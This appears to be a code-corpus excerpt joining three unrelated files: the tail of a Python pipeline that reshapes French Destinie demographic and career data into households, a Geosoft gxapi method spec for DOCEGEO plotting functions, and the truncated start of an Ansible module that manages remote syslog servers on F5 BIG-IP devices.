names = ['id', 'pere', 'mere', 'civilstate', 'partner', 'enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
)
# Index limites pour changement de date
delimiters = BioFam['id'].str.contains('Fin')
annee = BioFam[delimiters].index.tolist() # donne tous les index limites
annee = [-1] + annee # in order to simplify loops later
# create a series period
year0 = self.survey_year
period = []
for k in range(len(annee) - 1):
period = period + [year0 + k] * (annee[k + 1] - 1 - annee[k])
BioFam = BioFam[~delimiters].copy()
BioFam['period'] = period
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
BioFam[list_enf + ['pere', 'mere', 'partner']] -= 1
BioFam.loc[:, 'id'] = BioFam.loc[:, 'id'].astype(int) - 1
for var in ['pere', 'mere', 'partner'] + list_enf:
BioFam.loc[BioFam[var] < 0, var] = -1
BioFam = BioFam.fillna(-1)
# BioFam = drop_consecutive_row(
# BioFam.sort(['id', 'period']), ['id', 'pere', 'mere', 'partner', 'civilstate'])
BioFam.replace(-1, np.nan, inplace=True)
BioFam = minimal_dtype(BioFam)
BioFam['civilstate'].replace([2, 1, 4, 3, 5], [1, 2, 3, 4, 5], inplace=True)
return BioFam
log.info(u"Début de l'importation des données")
start_time = time.time()
self.entity_by_name['individus'], self.emp = _BioEmp_in_2()
def _recode_sexe(sexe):
''' devrait etre dans format mais plus pratique ici'''
if sexe.max() == 2:
sexe.replace(1, 0, inplace=True)
sexe.replace(2, 1, inplace=True)
return sexe
self.entity_by_name['individus']['sexe'] = _recode_sexe(self.entity_by_name['individus']['sexe'])
self.BioFam = _lecture_BioFam()
log.info(u"Temps d'importation des données : " + str(time.time() - start_time) + "s")
log.info(u"fin de l'importation des données")
def format_initial(self):
'''
Aggrégation des données en une seule base
- ind : démographiques + caractéristiques indiv
- emp_tot : déroulés de carrières et salaires associés
'''
log.info(u"Début de la mise en forme initiale")
start_time = time.time()
def _Emp_clean(ind, emp):
''' Mise en forme des données sur carrières:
Actualisation de la variable période
Création de la table décès qui donne l'année de décès des individus (index = identifiant) '''
emp = merge(emp, ind[['naiss']], left_on = 'id', right_on = ind[['naiss']].index)
emp['period'] = emp['period'] + emp['naiss']
# deces = emp.groupby('id')['period'].max()
emp = emp[['id', 'period', 'workstate', 'salaire_imposable']]
# Deux étapes pour recoder une nouvelle base Destinie avec le code d'une
# ancienne base : nouveaux états non pris en compte pour l'instant
# contractuel + stagiaire -> RG non-cadre
emp['workstate'].replace([11, 12, 13], 1, inplace = True)
# maladie + invalidité -> inactif
emp['workstate'].replace([621, 623, 624, 63], 6, inplace = True)
# Recodage des modalités
# TO DO : A terme faire une fonction propre à cette étape -> _rename(var)
# inactif <- 1 # chomeur <- 2 # non_cadre <- 3 # cadre <- 4
# fonct_a <- 5 # fonct_s <- 6 # indep <- 7 # avpf <- 8
# preret <- 9 # décès, ou immigré pas encore arrivé en France <- 0
# retraite <- 10 # etudiant <- 11 (scolarité hors cumul)
emp['workstate'].replace(
[0, 1, 2, 31, 32, 4, 5, 6, 7, 9, 8, 63],
[0, 3, 4, 5, 6, 7, 2, 1, 9, 8, 10, 11],
inplace = True
)
return emp
def _ind_total(BioFam, ind, emp):
''' fusion : BioFam + ind + emp -> ind '''
survey_year = self.survey_year
to_ind = merge(emp, BioFam, on=['id', 'period'], how ='left')
ind = merge(to_ind, ind, on='id', how = 'left')
ind.sort(['id', 'period'], inplace=True)
cond_atemp = (
(ind['naiss'] > survey_year) & (ind['period'] != ind['naiss'])
) | (
(ind['naiss'] <= survey_year) & (ind['period'] != survey_year)
)
ind.loc[cond_atemp, ['sexe', 'naiss', 'findet', 'tx_prime_fct']] = -1
return ind
def _ind_in_3(ind):
'''division de la table total entre les informations passées, à la date de l'enquête et futures
ind -> past, ind, futur '''
survey_year = self.survey_year
ind_survey = ind.loc[ind['period'] == survey_year, :].copy()
ind_survey.fillna(-1, inplace=True)
ind_survey['civilstate'].replace(-1, 2, inplace=True)
ind_survey['workstate'].replace([-1, 0], 1, inplace=True)
if 'tx_prime_fct' in ind_survey.columns:
ind_survey.rename(columns={'tx_prime_fct': 'tauxprime'}, inplace=True)
log.info(u"Nombre dindividus présents dans la base en {}: {}".format(
survey_year,
len(ind_survey),
))
past = ind[ind['period'] < survey_year].copy()
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
list_intraseques = ['sexe', 'naiss', 'findet', 'tx_prime_fct']
list_to_drop = list_intraseques + list_enf
past.drop(list_to_drop, axis=1, inplace=True)
# It's a bit strange because that data where in the right shape
# at first but it more general like that '''
past['period'] = 100 * past['period'] + 1
for varname in ['salaire_imposable', 'workstate']:
self.longitudinal[varname] = past.pivot(index='id', columns='period', values=varname)
log.info(u"Nombre de lignes sur le passé : {} (informations de {} à {}".format(
len(past),
past['period'].min(),
past['period'].max()),
)
past['period'] = (past['period'] - 1) / 100
# La table futur doit contenir une ligne par changement de statut à partir de l'année n+1,
# on garde l'année n, pour
# voir si la situation change entre n et n+1
# Indications de l'année du changement + variables inchangées -> -1
futur = ind[ind['period'] >= survey_year].copy()
futur.drop(list_enf, axis=1, inplace=True)
futur.fillna(-1, inplace=True)
# futur = drop_consecutive_row(futur.sort(['id', 'period']),
# ['id', 'workstate', 'salaire_imposable', 'pere', 'mere', 'civilstate', 'partner'])
futur = futur[futur['period'] > survey_year]
return ind_survey, past, futur
def _work_on_futur(futur, ind):
''' ajoute l'info sur la date de décès '''
# On rajoute une ligne par individu pour spécifier leur décès (seulement période != -1)
def __deces_indicated_lastyearoflife():
# dead = DataFrame(index = deces.index.values, columns = futur.columns)
# dead['period'][deces.index.values] = deces.values
# dead['id'][deces.index.values] = deces.index.values
# dead.fillna(-1, inplace=True)
# dead['death'] = dead['period']*100 + 1
dead = DataFrame(deces)
dead['id'] = dead.index
dead['death'] = dead['period'] * 100 + 1
futur = concat([futur, dead], axis=0, ignore_index=True)
futur.fillna(-1, inplace=True)
futur = futur.sort(['id', 'period', 'dead']).reset_index().drop('index', 1)
futur.drop_duplicates(['id', 'period'], inplace=True)
dead = futur[['id', 'period']].drop_duplicates('id', take_last=True).index
futur['deces'] = -1
futur.loc[dead, 'deces'] = 1
futur = futur.sort(['period', 'id']).reset_index().drop(['index', 'dead'], 1)
return futur
def __death_unic_event(futur):
futur = futur.sort(['id', 'period'])
no_last = futur.duplicated('id', take_last=True)
futur['death'] = -1
cond_death = not(no_last) & ((futur['workstate'] == 0) | (futur['period'] != 2060))
futur.loc[cond_death, 'death'] = 100 * futur.loc[cond_death, 'period'] + 1
futur.loc[(futur['workstate'] != 0) & (futur['death'] != -1), 'death'] += 1
add_lines = futur.loc[(futur['period'] > futur['death']) & (futur['death'] != -1), 'id']
if len(add_lines) != 0:
# TODO: prévoir de rajouter une ligne quand il n'existe pas de ligne associée à la date de mort.
print(len(add_lines))
pdb.set_trace()
return futur
futur = __death_unic_event(futur)
return futur
emp = _Emp_clean(self.entity_by_name['individus'], self.emp)
ind_total = _ind_total(self.BioFam, self.entity_by_name['individus'], emp)
ind, past, futur = _ind_in_3(ind_total)
futur = _work_on_futur(futur, ind)
for table in ind, past, futur:
table['period'] = 100 * table['period'] + 1
self.entity_by_name['individus'] = ind
self.past = past
self.futur = futur
log.info(u"Temps de la mise en forme initiale : " + str(time.time() - start_time) + "s")
log.info(u"Fin de la mise en forme initiale")
def enf_to_par(self):
'''Vérifications des liens de parentés '''
ind = self.entity_by_name['individus']
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
ind = ind.set_index('id')
ind['id'] = ind.index
year_ini = self.survey_year # = 2009
log.info(u"Début de l'initialisation des données pour " + str(year_ini))
# Déclarations initiales des enfants
pere_ini = ind[['id', 'pere']]
mere_ini = ind[['id', 'mere']]
list_enf = ['enf1', 'enf2', 'enf3', 'enf4', 'enf5', 'enf6']
# Comparaison avec les déclarations initiales des parents
for par in ['mere', 'pere']:
# a -Définition des tables initiales:
if par == 'pere':
par_ini = pere_ini
sexe = 0
else:
par_ini = mere_ini
sexe = 1
# b -> construction d'une table a trois entrées :
# par_decla = identifiant du parent déclarant l'enfant
# par_ini = identifiant du parent déclaré par l'enfant
# id = identifiant de l'enfant (déclaré ou déclarant)
par_ini = par_ini[par_ini[par] != -1]
link = ind.loc[(ind['enf1'] != -1) & (ind['sexe'] == sexe), list_enf]
link = link.stack().reset_index().rename(
columns = {'id': par, 'level_1': 'link', 0: 'id'}
)[[par, 'id']].astype(int)
link = link[link['id'] != -1]
link = merge(link, par_ini, on = 'id', suffixes=('_decla', '_ini'),
how = 'outer').fillna(-1)
link = link[(link[par + '_decla'] != -1) | (link[par + '_ini'] != -1)]
ind['men_' + par] = 0
# c- Comparaisons et détermination des liens
# Cas 1 : enfants et parents déclarent le même lien : ils vivent ensembles
parents = link.loc[(link[par + '_decla'] == link[par + '_ini']), 'id']
ind.loc[parents.values, 'men_' + par] = 1
# Cas 2 : enfants déclarant un parent mais ce parent ne les déclare pas (rattachés au ménage du parent)
# Remarques : 8 cas pour les pères, 10 pour les mères
parents = link[(link[par + '_decla'] != link[par + '_ini']) & (link[par + '_decla'] == -1)]['id']
ind.loc[parents.values, 'men_' + par] = 1
log.info(str(sum(ind['men_' + par] == 1)) + " vivent avec leur " + par)
# Cas 3 : parent déclarant un enfant mais non déclaré par l'enfant (car hors ménage)
# Aucune utilisation pour l'instant (men_par = 0) mais pourra servir pour la dépendance
parents = link.loc[
(link[par + '_decla'] != link[par + '_ini']) & (link[par + '_ini'] == -1),
['id', par + '_decla']
].astype(int)
ind.loc[parents['id'].values, par] = parents[par + '_decla'].values
log.info(str(sum((ind[par].notnull() & (ind[par] != -1)))) + " enfants connaissent leur " + par)
self.entity_by_name['individus'] = ind.drop(list_enf, axis=1)
def corrections(self):
'''
Vérifications/corrections de :
- La réciprocité des déclarations des conjoints
- La concordance de la déclaration des états civils en cas de réciprocité
- partner hdom : si couple_hdom=True, les couples ne vivant pas dans le même domicile sont envisageable,
sinon non.
'''
ind = self.entity_by_name['individus']
ind = ind.fillna(-1)
rec = ind.loc[
ind['partner'] != -1, ['id', 'partner', 'civilstate', 'pere', 'mere']] # | ind['civilstate'].isin([1,5])
reciprocity = rec.merge(rec, left_on='id', right_on='partner', suffixes=('', '_c'))
rec = reciprocity
# 1- check reciprocity of partner
assert all(rec['partner_c'] == rec['id'])
assert all(rec.loc[rec['civilstate'].isin([1, 5]), 'partner'] > -1)
# 2- priority to marriage
rec.loc[rec['civilstate_c'] == 1, 'civilstate'] = 1
ind.loc[ind['partner'] != -1, 'civilstate'] = rec['civilstate'].values
# 3- faux conjoint(ou couple hdom)
ind.loc[ind['civilstate'].isin([1, 5]) & (ind['partner'] == -1), 'civilstate'] = 2
# correction : vient directement de la base Destinie
rec.loc[rec['pere_c'] == rec['pere'], 'pere'] = -1
rec.loc[rec['mere_c'] == rec['mere'], 'mere'] = -1
ind.loc[ind['partner'] != -1, 'pere'] = rec['pere'].values
ind.loc[ind['partner'] != -1, 'mere'] = rec['mere'].values
self.entity_by_name['individus'] = ind
def creation_menage(self):
ind = self.entity_by_name['individus']
survey_year = self.survey_year
ind['quimen'] = -1
ind['idmen'] = -1
# TODO: add a random integer for month
ind['age_en_mois'] = 12 * (survey_year - ind['naiss'])
ind.fillna(-1, inplace=True)
# 1ere étape : Détermination des têtes de ménages
# (a) - Plus de 25 ans ou plus de 17ans ne déclarant ni pères, ni mères
maj = (
(ind.loc[:, 'age_en_mois'] >= 12 * 25) |
((ind.loc[:, 'men_pere'] == 0) & (ind.loc[:, 'men_mere'] == 0) & (ind.loc[:, 'age_en_mois'] > 12 * 16))
).copy()
ind.loc[maj, 'quimen'] = 0
log.info('nb_sans_menage_a: {}'.format(len(ind.loc[~ind['quimen'].isin([0, 1]), :])))
# (b) - Personnes prenant en charge d'autres individus
# Mères avec enfants à charge : (ne rajoute aucun ménage)
enf_mere = ind.loc[
(ind['men_pere'] == 0) & (ind['men_mere'] == 1) & (ind['age_en_mois'] <= 12 * 25),
'mere',
].astype(int)
ind.loc[enf_mere.values, 'quimen'] = 0
# Pères avec enfants à charge :(ne rajoute aucun ménage)
enf_pere = ind.loc[
(ind['men_mere'] == 0) & (ind['men_pere'] == 1) & (ind['age_en_mois'] <= 12 * 25),
'pere',
].astype(int)
ind.loc[enf_pere.values, 'quimen'] = 0
log.info('nb_sans_menage_b', len(ind.loc[~ind['quimen'].isin([0, 1]), :]))
# (c) - Correction pour les personnes en couple non à charge [identifiant le plus petit = tête de ménage]
ind.loc[(ind['partner'] > ind['id']) & (ind['partner'] != -1) & (ind['quimen'] != -2), 'quimen'] = 0
ind.loc[(ind['partner'] < ind['id']) & (ind['partner'] != -1) & (ind['quimen'] != -2), 'quimen'] = 1
log.info(str(len(ind[ind['quimen'] == 0])) + u" ménages ont été constitués ") # 20815
log.info(u" dont " + str(len(ind[ind['quimen'] == 1])) + " couples") # 9410
# 2eme étape : attribution du numéro de ménage grâce aux têtes de ménage
nb_men = len(ind.loc[(ind['quimen'] == 0), :])
# Rq : les 10 premiers ménages correspondent à des institutions et non des ménages ordinaires
# 0 -> DASS, 1 ->
ind.loc[ind['quimen'] == 0, 'idmen'] = range(10, nb_men + 10)
# 3eme étape : Rattachement des autres membres du ménage
# (a) - Rattachements des partners des personnes en couples
partner = ind.loc[(ind['quimen'] == 1), ['id', 'partner']].astype(int)
ind['idmen'][partner['id'].values] = ind['idmen'][partner['partner'].values].copy()
# (b) - Rattachements de leurs enfants (d'abord ménage de la mère, puis celui du père)
for par in ['mere', 'pere']:
enf_par = ind.loc[((ind['men_' + par] == 1) & (ind['idmen'] == -1)), ['id', par]].astype(int)
ind['idmen'][enf_par['id']] = ind['idmen'][enf_par[par]].copy()
# print str(sum((ind['idmen']!= -1))) + " personnes ayant un ménage attribué"
# TODO: ( Quand on sera à l'étape gestion de la dépendance ) :
# créer un ménage fictif maison de retraite + comportement d'affectation.
ind['tuteur'] = -1
# # (c) - Rattachements des éventuels parents à charge
# # Personnes ayant un parent à charge de plus de 75 ans : (rajoute 190 ménages)
# care = {}
# for par in ['mere', 'pere']:
# care_par = ind.loc[(ind['men_' + par] == 1), ['id',par]].astype(int)
# par_care = ind.loc[
# (ind['age_en_mois'] > 12*74) & (ind['id'].isin(care_par[par].values) & (ind['partner'] == -1)),
# ['id']
# ]
# care_par = care_par.merge(par_care, left_on=par, right_on='id', how='inner',
# suffixes = ('_enf', '_'+par))[['id_enf', 'id_'+par]]
# #print 'Nouveaux ménages' ,len(ind.loc[(ind['id'].isin(care_par['id_enf'].values)) & ind['quimen']!= 0])
# # Enfant ayant des parents à charge deviennent tête de ménage, parents à charge n'ont pas de foyers
# ind.loc[care_par['id_enf'], 'quimen'] = 0
# ind.loc[care_par['id_' + par], 'quimen'] = -2 # pour identifier les couples à charge
# # Si personne potentiellement à la charge de plusieurs enfants -> à charge de l'enfant ayant l'identifiant
# # le plus petit
# care_par.drop_duplicates('id_' + par, inplace=True)
# care[par] = care_par
# print str(len(care_par)) +" " + par + "s à charge"
#
# for par in ['mere', 'pere']:
# care_par = care[par]
# care_par = ind.loc[ind['id'].isin(care_par['id_enf'].values) & (ind['idmen'] != -1), par]
# ind.loc[care_par.values,'idmen'] = ind.loc[care_par.index.values,'idmen']
# ind.loc[care_par.values,'tuteur'] = care_par.index.values
# #print str(sum((ind['idmen']!= -1))) + " personnes ayant un ménage attribué"
# # Rétablissement de leur quimen
# ind['quimen'].replace(-2, 2, inplace=True)
# # Rq : il faut également rattacher le deuxième parent :
# partner_dep = ind.loc[(ind['idmen'] == -1) & (ind['partner'] != -1), ['id', 'partner']]
# ind['idmen'][partner_dep['id'].values] = ind['idmen'][partner_dep['partner'].values]
# assert ind.loc[(ind['tuteur'] != -1), 'age_en_mois'].min() > 12*70
# 4eme étape : création d'un ménage fictif résiduel :
# Enfants sans parents : dans un foyer fictif équivalent à la DASS = 0
ind.loc[(ind['idmen'] == -1) & (ind['age_en_mois'] < 12 * 18), 'idmen'] = 0
# 5eme étape : mises en formes finales
# attribution des quimen pour les personnes non référentes
ind.loc[~ind['quimen'].isin([0, 1]), 'quimen'] = 2
# suppressions des variables inutiles
ind.drop(['men_pere', 'men_mere'], axis=1, inplace=True)
# 6eme étape : création de la table men
men = ind.loc[ind['quimen'] == 0, ['id', 'idmen']].copy()
men.rename(columns={'id': 'pref', 'idmen': 'id'}, inplace=True)
# Rajout des foyers fictifs
to_add = DataFrame([np.zeros(len(men.columns))], columns = men.columns)
to_add['pref'] = -1
to_add['id'] = 0
men = concat([men, to_add], axis = 0, join='outer', ignore_index=True)
for var in ['loyer', 'tu', 'zeat', 'surface', 'resage', 'restype', 'reshlm', 'zcsgcrds', 'zfoncier', 'zimpot',
'zpenaliv', 'zpenalir', 'zpsocm', 'zrevfin']:
men[var] = 0
men['pond'] = 1
men['period'] = self.survey_date
men.fillna(-1, inplace=True)
ind.fillna(-1, inplace=True)
log.info(ind[ind['idmen'] == -1].to_string())
# Tout les individus doievtn appartenir à un ménage
assert sum((ind['idmen'] == -1)) == 0
assert sum((ind['quimen'] < 0)) == 0
# Vérification que le nombre de tête de ménage n'excède pas 1 par ménage
assert max(ind.loc[ind['quimen'] == 0, :].groupby('idmen')['quimen'].count()) == 1
log.info('Taille de la table men : {}'.format(len(men)))
self.entity_by_name['individus'] = ind
self.entity_by_name['menages'] = men
def add_futur(self):
log.info(u"Début de l'actualisation des changements jusqu'en 2060")
# TODO: déplacer dans DataTil
ind = self.entity_by_name['individus']
futur = self.futur
men = self.entity_by_name['menages']
past = self.past
foy = self.entity_by_name['foyers_fiscaux']
for data in [futur, past]:
if data is not None:
for var in ind.columns:
if var not in data.columns:
data[var] = -1
# On ajoute ces données aux informations de 2009
# TODO: être sur que c'est bien.
ind = concat([ind, futur], axis=0, join='outer', ignore_index=True)
ind.fillna(-1, inplace=True)
men.fillna(-1, inplace=True)
foy.fillna(-1, inplace=True)
ind.sort(['period', 'id'], inplace=True)
self.entity_by_name['individus'] = ind
self.entity_by_name['menages'] = men
self.entity_by_name['foyers_fiscaux'] = foy
log.info(u"Fin de l'actualisation des changements jusqu'en 2060")
if __name__ == '__main__':
logging.basicConfig(level = logging.INFO, stream = sys.stdout)
data = Destinie()
start_t = time.time()
# (a) - Importation des données et corrections préliminaires
data.load()
data.format_initial()
# (b) - Travail sur la base initiale (données à l'année de l'enquête)
ini_t = time.time()
data.enf_to_par()
data.corrections()
data.creation_menage()
data.creation_foy()
# (c) - Ajout des informations futures et mise au format Liam
futur_t = time.time()
# data.add_futur()
data.format_to_liam()
data.final_check()
data.store_to_liam()
log.info(
"Temps Destiny.py : " + str(time.time() - start_t) + "s, dont " +
str(futur_t - ini_t) + "s pour les mises en formes/corrections initiales et " +
str(time.time() - futur_t) + "s pour l'ajout des informations futures et la mise au format Liam"
)
| gpl-3.0 | -679,478,304,218,613,800 | 47.010309 | 120 | 0.533498 | false |
GeosoftInc/gxapi | spec/ps/DOCEGEO.py | 1 | 5366 | from .. import Availability, Class, Constant, Define, Method, Parameter, Type
gx_class = Class('DOCEGEO',
doc="Technical Services GX functions Header File for Docegeo")
gx_defines = [
]
gx_methods = {
'Docegeo': [
Method('IPSectionPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo IP section plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="IP",
doc="IP handle"),
Parameter('param1', type="DB",
doc="GDB handle"),
Parameter('param2', type=Type.STRING,
doc="Current line"),
Parameter('param3', type=Type.STRING,
doc="Map tag name"),
Parameter('param4', type=Type.STRING,
doc="Map name"),
Parameter('param5', type=Type.STRING,
doc="Control file")
]),
Method('WPSectionPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo Target section plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DH",
doc="DH handle"),
Parameter('param1', type=Type.STRING,
doc="Map name"),
Parameter('param2', type=Type.STRING,
doc="Section INI (*.ins) file")
]),
Method('QCReject_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="QC reject function",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DB",
doc="DB handle"),
Parameter('param1', type="DB_SYMB",
doc="Line"),
Parameter('param2', type=Type.INT32_T,
doc="New QC channel?"),
Parameter('param3', type="DB_SYMB",
doc="QC channel symbol"),
Parameter('param4', type=Type.DOUBLE,
doc="Min I"),
Parameter('param5', type=Type.DOUBLE,
doc="Max Noise"),
Parameter('param6', type=Type.DOUBLE,
doc="Max Error"),
Parameter('param7', type=Type.DOUBLE,
doc="Max RS"),
Parameter('param8', type=Type.DOUBLE,
doc="Max Vp"),
Parameter('param9', type="DB_SYMB",
doc="I Channel"),
Parameter('param10', type="DB_SYMB",
doc="IP Channel"),
Parameter('param11', type="DB_SYMB",
doc="Err Channel"),
Parameter('param12', type="DB_SYMB",
doc="Rs Channel"),
Parameter('param13', type="DB_SYMB",
doc="Vp Channel"),
Parameter('param14', type="DB_SYMB",
doc="IPlog Channel")
]),
Method('PlotThompson_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Thompson duplicate results plot",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="MVIEW",
doc="MVIEW handle"),
Parameter('param1', type="VV",
doc="Data"),
Parameter('param2', type=Type.DOUBLE,
doc="Detect limit"),
Parameter('param3', type=Type.STRING,
doc="Plot title"),
Parameter('param4', type=Type.STRING,
doc="Unit"),
Parameter('param5', type=Type.DOUBLE,
doc="X location"),
Parameter('param6', type=Type.DOUBLE,
doc="Y location"),
Parameter('param7', type=Type.DOUBLE,
doc="X size"),
Parameter('param8', type=Type.DOUBLE,
doc="Y size")
]),
Method('PlobPlot_DOCEGEO', module='geocsdocegeo', version='6.3.0',
availability=Availability.EXTENSION,
doc="Docegeo ProbPlot function",
return_type=Type.VOID,
return_doc="Nothing",
parameters = [
Parameter('param0', type="DB",
doc="DB handle"),
Parameter('param1', type=Type.STRING,
doc="Control file")
])
]
}
| bsd-2-clause | -2,517,532,100,698,699,300 | 42.274194 | 79 | 0.422102 | false |
albertomurillo/ansible | lib/ansible/modules/network/f5/bigip_remote_syslog.py | 14 | 14569 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_remote_syslog
short_description: Manipulate remote syslog settings on a BIG-IP
description:
- Manipulate remote syslog settings on a BIG-IP.
version_added: 2.5
options:
remote_host:
description:
- Specifies the IP address, or hostname, for the remote system to
which the system sends log messages.
type: str
required: True
name:
description:
- Specifies the name of the syslog object.
- This option is required when multiple C(remote_host) with the same IP
or hostname are present on the device.
- If C(name) is not provided C(remote_host) is used by default.
type: str
version_added: 2.8
remote_port:
description:
- Specifies the port that the system uses to send messages to the
remote logging server.
- When creating a remote syslog, if this parameter is not specified, the
default value C(514) is used.
type: str
local_ip:
description:
- Specifies the local IP address of the system that is logging. To
provide no local IP, specify the value C(none).
- When creating a remote syslog, if this parameter is not specified, the
default value C(none) is used.
type: str
state:
description:
- When C(present), guarantees that the remote syslog exists with the provided
attributes.
- When C(absent), removes the remote syslog from the system.
type: str
choices:
- absent
- present
default: present
extends_documentation_fragment: f5
author:
- Tim Rupp (@caphrim007)
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Add a remote syslog server to log to
bigip_remote_syslog:
remote_host: 10.10.10.10
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Add a remote syslog server on a non-standard port to log to
bigip_remote_syslog:
remote_host: 10.10.10.10
remote_port: 1234
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
remote_port:
description: New remote port of the remote syslog server.
returned: changed
type: int
sample: 514
local_ip:
description: The new local IP of the remote syslog server
returned: changed
type: str
sample: 10.10.10.10
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.compare import compare_dictionary
from library.module_utils.network.f5.common import is_valid_hostname
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.ipaddress import is_valid_ip
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.compare import compare_dictionary
from ansible.module_utils.network.f5.common import is_valid_hostname
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.ipaddress import is_valid_ip
class Parameters(AnsibleF5Parameters):
api_map = {
'remotePort': 'remote_port',
'localIp': 'local_ip',
'host': 'remote_host',
}
updatables = [
'remote_port',
'local_ip',
'remote_host',
'name',
]
returnables = [
'remote_port',
'local_ip',
'remote_host',
'name',
'remoteServers',
]
api_attributes = [
'remotePort',
'localIp',
'host',
'name',
'remoteServers',
]
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
@property
def remote_host(self):
if is_valid_ip(self._values['remote_host']):
return self._values['remote_host']
elif is_valid_hostname(self._values['remote_host']):
return str(self._values['remote_host'])
raise F5ModuleError(
"The provided 'remote_host' is not a valid IP or hostname"
)
@property
def remote_port(self):
if self._values['remote_port'] in [None, 'none']:
return None
if self._values['remote_port'] == 0:
raise F5ModuleError(
"The 'remote_port' value must between 1 and 65535"
)
return int(self._values['remote_port'])
@property
def local_ip(self):
if self._values['local_ip'] in [None, 'none']:
return None
if is_valid_ip(self._values['local_ip']):
return self._values['local_ip']
else:
raise F5ModuleError(
"The provided 'local_ip' is not a valid IP address"
)
@property
def name(self):
if self._values['remote_host'] is None:
return None
if self._values['name'] is None:
return None
name = fq_name(self.partition, self._values['name'])
return name
class Changes(Parameters):
def to_return(self):
result = {}
try:
for returnable in self.returnables:
change = getattr(self, returnable)
if isinstance(change, dict):
result.update(change)
else:
result[returnable] = change
result = self._filter_params(result)
except Exception:
pass
return result
class UsableChanges(Changes):
pass
class ReportableChanges(Changes):
@property
def remote_port(self):
if self._values['remote_port'] is None:
return None
return int(self._values['remote_port'])
@property
def remoteServers(self):
pass
class Difference(object):
def __init__(self, want, have=None):
self.want = want
self.have = have
self._local_ip = None
self._remote_port = None
def compare(self, param):
try:
result = getattr(self, param)
return result
except AttributeError:
return self.__default(param)
def __default(self, param):
attr1 = getattr(self.want, param)
try:
attr2 = getattr(self.have, param)
if attr1 != attr2:
return attr1
except AttributeError:
return attr1
class ModuleManager(object):
def __init__(self, *args, **kwargs):
self.module = kwargs.pop('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
self.have = ApiParameters()
self.changes = UsableChanges()
# A list of all the syslogs queried from the API when reading current info
# from the device. This is used when updating the API as the value that needs
# to be updated is a list of syslogs and PATCHing a list would override any
# default settings.
self.syslogs = dict()
def _announce_deprecations(self, result):
warnings = result.pop('__warnings', [])
for warning in warnings:
self.module.deprecate(
msg=warning['msg'],
version=warning['version']
)
def _update_changed_options(self):
diff = Difference(self.want, self.have)
updatables = Parameters.updatables
changed = dict()
for k in updatables:
change = diff.compare(k)
if change is None:
continue
else:
if isinstance(change, dict):
changed.update(change)
else:
changed[k] = change
if changed:
self.changes = UsableChanges(params=changed)
return True
return False
def format_syslogs(self, syslogs):
result = None
for x in syslogs:
syslog = ApiParameters(params=x)
self.syslogs[syslog.name] = x
if syslog.name == self.want.name:
result = syslog
elif syslog.remote_host == self.want.remote_host:
result = syslog
if not result:
return ApiParameters()
return result
def exec_module(self):
result = dict()
changed = self.present()
reportable = ReportableChanges(params=self.changes.to_return())
changes = reportable.to_return()
result.update(**changes)
result.update(dict(changed=changed))
self._announce_deprecations(result)
return result
def present(self):
return self.update()
def should_update(self):
result = self._update_changed_options()
if result:
return True
return False
def update(self):
self.have = self.format_syslogs(self.read_current_from_device())
if not self.should_update() and self.want.state != 'absent':
return False
if self.module.check_mode:
return True
if self.want.name is None:
self.want.update({'name': self.want.remote_host})
syslogs = [v for k, v in iteritems(self.syslogs)]
dupes = [x for x in syslogs if x['host'] == self.want.remote_host]
if len(dupes) > 1:
raise F5ModuleError(
"Multiple occurrences of hostname: {0} detected, please specify 'name' parameter". format(self.want.remote_host)
)
# A absent syslog does not appear in the list of existing syslogs
if self.want.state == 'absent':
if self.want.name not in self.syslogs:
return False
# At this point we know the existing syslog is not absent, so we need
# to change it in some way.
#
# First, if we see that the syslog is in the current list of syslogs,
# we are going to update it
changes = dict(self.changes.api_params())
if self.want.name in self.syslogs:
self.syslogs[self.want.name].update(changes)
else:
# else, we are going to add it to the list of syslogs
self.syslogs[self.want.name] = changes
# Since the name attribute is not a parameter tracked in the Parameter
# classes, we will add the name to the list of attributes so that when
# we update the API, it creates the correct vector
self.syslogs[self.want.name].update({'name': self.want.name})
# Finally, the absent state forces us to remove the syslog from the
# list.
if self.want.state == 'absent':
del self.syslogs[self.want.name]
# All of the syslogs must be re-assembled into a list of dictionaries
# so that when we PATCH the API endpoint, the syslogs list is filled
# correctly.
#
# There are **not** individual API endpoints for the individual syslogs.
# Instead, the endpoint includes a list of syslogs that is part of the
# system config
